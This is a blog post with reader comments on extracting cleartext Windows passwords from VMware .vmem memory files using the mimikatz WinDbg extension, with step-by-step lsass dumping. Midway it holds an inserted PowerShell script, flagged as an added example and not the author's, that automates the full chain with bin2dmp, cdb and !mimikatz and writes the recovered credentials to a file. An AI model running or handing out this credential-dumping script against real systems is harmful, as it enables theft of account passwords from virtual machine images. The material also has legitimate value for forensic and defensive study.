Benjamin Delpy, the author of the well-known mimikatz toolkit, has released a very cool extension to WinDbg today.
In summary, the extension can extract Windows passwords from memory dumps, hibernation files and Virtual Machine .vmem files (paging, snapshots).
Especially the ability to extract passwords from .vmem files was very interesting, so I decided to test this out. Let's see how it works!
First you need to download and install the Debugging Tools for Windows (WinDbg). Then you need the MoonSols Windows Memory Toolkit (the Free edition suffices) and finally you need to download mimikatz.
Extract bin2dmp.exe from Windows Memory Toolkit and use it to convert a .vmem file to a .dmp file:
Now start WinDbg and load the generated dump file via File -> Open Crash Dump. Then load the mimilib.dll that matches the architecture of the dump (the 32-bit library for x86 dumps and the 64-bit library for x64 dumps):
eg: .load mimilib.dll
Now search for the lsass process (!process 0 0 lsass.exe) and switch the debugger to that process using the returned address:
Finally enter !mimikatz and wait for the magic to happen:
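The same procedure can be driven end to end from PowerShell with cdb.exe, the console version of WinDbg, so the output lands in a text file instead of being read off the GUI. This is an added example and not the author's or mimikatz's own code; the tool paths, the symbol cache directory and the cdb/mimilib flavour (x64 here) are assumptions you will need to adjust to your install.

```powershell
# Added example (not from the original post): run bin2dmp, WinDbg/cdb and
# !mimikatz as one scripted pipeline against a VMware .vmem file.
# Assumed paths below: bin2dmp.exe, cdb.exe, mimilib.dll and a local symbol cache.
param(
    [Parameter(Mandatory)][string]$VmemPath,   # the .vmem of a powered-off VM or snapshot
    [string]$DumpPath    = [IO.Path]::ChangeExtension($VmemPath, '.dmp'),
    [string]$Bin2Dmp     = 'C:\Tools\MoonSols\bin2dmp.exe',                               # assumed
    [string]$Cdb         = 'C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x64\cdb.exe', # assumed; use ...\x86\cdb.exe for 32-bit dumps
    [string]$MimiLib     = 'C:\Tools\mimikatz\x64\mimilib.dll',                            # assumed; use the Win32 build for 32-bit dumps
    [string]$SymbolCache = 'C:\Symbols'                                                    # assumed local cache directory
)

$ErrorActionPreference = 'Stop'

# Step 1: convert the raw .vmem into a Microsoft crash dump.
# bin2dmp must be able to open the file, so the VM must not be running against it.
if (-not (Test-Path $DumpPath)) {
    & $Bin2Dmp $VmemPath $DumpPath
    if ($LASTEXITCODE -ne 0 -or -not (Test-Path $DumpPath)) {
        throw "bin2dmp failed to convert $VmemPath"
    }
}

# mimilib walks kernel and lsass structures, so the debugger needs symbols for
# ntoskrnl and the lsass modules. .symfix points it at the Microsoft public symbol
# server and caches downloads in $SymbolCache; without symbols you get the
# "symbols could not be loaded" errors and !mimikatz finds nothing.
$prologue = ".symfix $SymbolCache; .reload; .load $MimiLib"

function Invoke-Cdb([string]$Commands) {
    # -z opens a crash dump, -c runs the given debugger commands; q quits afterwards.
    & $Cdb -z $DumpPath -c "$Commands; q" | Out-String
}

# Step 2: find the lsass.exe EPROCESS address (the "PROCESS ffff..." line).
$listing = Invoke-Cdb "$prologue; !process 0 0 lsass.exe"
$m = [regex]::Match($listing, 'PROCESS\s+([0-9a-fA-F`]+)')
if (-not $m.Success) {
    throw "lsass.exe not found in $DumpPath (wrong bitness of cdb/mimilib, or symbols missing?):`n$listing"
}
$lsass = $m.Groups[1].Value

# Step 3: switch the debugger context to lsass (/r reloads user-mode symbols,
# /p selects the process by EPROCESS address) and let !mimikatz do its work.
$result = Invoke-Cdb "$prologue; .process /r /p $lsass; !mimikatz"
$result | Tee-Object -FilePath ([IO.Path]::ChangeExtension($DumpPath, '.mimikatz.txt'))
```

Run it as `.\Dump-VmemCreds.ps1 -VmemPath C:\VMs\target\target.vmem` from an elevated prompt on the analysis box. The bitness of cdb.exe and mimilib.dll must match the dump, exactly as for the GUI procedure, and the first run takes a while because the symbol server downloads are cached on demand.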
I have just one word, WOW. Great job by Benjamin again!
6 Responses for "Dumping passwords in a VMware .vmem file"
[…] earlier this week the twitter flow went bananas when Remko did a blog about how to extract the password in clear text from a VMware vmem file with the add-on from Benjamin, Mimikatz that extends the […]
Thanks man, very good.
Several problems using the procedure on a Windows 10 host. The WinDbg install from the Windows 7 SDK complains about .NET 4.0 being pre-beta and won't install (no surprise there).
Turning to the Windows 8.1 SDK standalone debugging tools at https://msdn.microsoft.com/en-us/windows/hardware/hh852365 will install, but they then throw messages about symbols not found (I have no path configured or symbols loaded; why not… where do they come from?). The error when loading my dmp file is *** ERROR: Module load completed but symbols could not be loaded for ntdll.dll
I am unsure what to do next to resolve the symbols issue.
Troubleshooting this, I moved to a Win7 Pro VMware client for hosting WinDbg and am having the same issue. Now downloading symbols from https://msdn.microsoft.com/en-us/windows/hardware/gg463028
Hope this fixes my issue. Can you comment on the symbols prerequisites (needed or not) in your procedure to support new users of WinDbg?
Thanks for the post Remko, I got it all to work once I added my symbols to WinDbg.
I would like to ask a question about the MoonSols Windows Memory Toolkit.
I'm trying to convert the vmem file to a dmp file in order to load it in WinDbg. However, I ran into the problem below.
C:\Convert2>bin2dmp.exe “564da03e-2732-65fd-1489-1c0d299883a3.vmem” test.dmp
bin2dmp – 1.0.20100405 – (Professional Edition – Single User Licence)
Convert raw memory dump images into Microsoft crash dump files.
Copyright (C) 2007 – 2010, Matthieu Suiche
Copyright (C) 2009 – 2010, MoonSols
User , ()
Initializing memory descriptors… Done.
Looking for kernel variables… Failed.
Cannot open file. Please check if the file is not being used.
C:\Convert2>
Thank you in advance.